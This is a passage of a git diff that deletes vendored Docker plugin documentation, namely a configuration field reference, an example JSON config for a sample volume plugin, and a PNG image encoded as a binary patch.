-          capabilities of the plugin (*Linux only*), see list [`here`](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md#security)
-
-    - **`allowAllDevices`** *boolean*
-
-	If `/dev` is bind mounted from the host, and allowAllDevices is set to true, the plugin will have `rwm` access to all devices on the host.
-
-    - **`devices`** *PluginDevice array*
-
-          device of the plugin, (*Linux only*), struct consisting of the following fields, see [`DEVICES`](https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#devices)
-
-          - **`name`** *string*
-
-	      name of the device.
-
-          - **`description`** *string*
-
-              description of the device.
-
-          - **`path`** *string*
-
-              path of the device.
-
-## Example Config
-
-*Example showing the 'tiborvass/sample-volume-plugin' plugin config.*
-
-```json
-{
-            "Args": {
-                "Description": "",
-                "Name": "",
-                "Settable": null,
-                "Value": null
-            },
-            "Description": "A sample volume plugin for Docker",
-            "Documentation": "https://docs.docker.com/engine/extend/plugins/",
-            "Entrypoint": [
-                "/usr/bin/sample-volume-plugin",
-                "/data"
-            ],
-            "Env": [
-                {
-                    "Description": "",
-                    "Name": "DEBUG",
-                    "Settable": [
-                        "value"
-                    ],
-                    "Value": "0"
-                }
-            ],
-            "Interface": {
-                "Socket": "plugin.sock",
-                "Types": [
-                    "docker.volumedriver/1.0"
-                ]
-            },
-            "Linux": {
-                "Capabilities": null,
-                "AllowAllDevices": false,
-                "Devices": null
-            },
-            "Mounts": null,
-            "Network": {
-                "Type": ""
-            },
-            "PropagatedMount": "/data",
-            "User": {},
-            "Workdir": ""
-}
-```
diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png b/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png
deleted file mode 100644
index 1a6a6d01d2048fcb975b7d2b025cdfabd4c4f5f3..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 45916
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
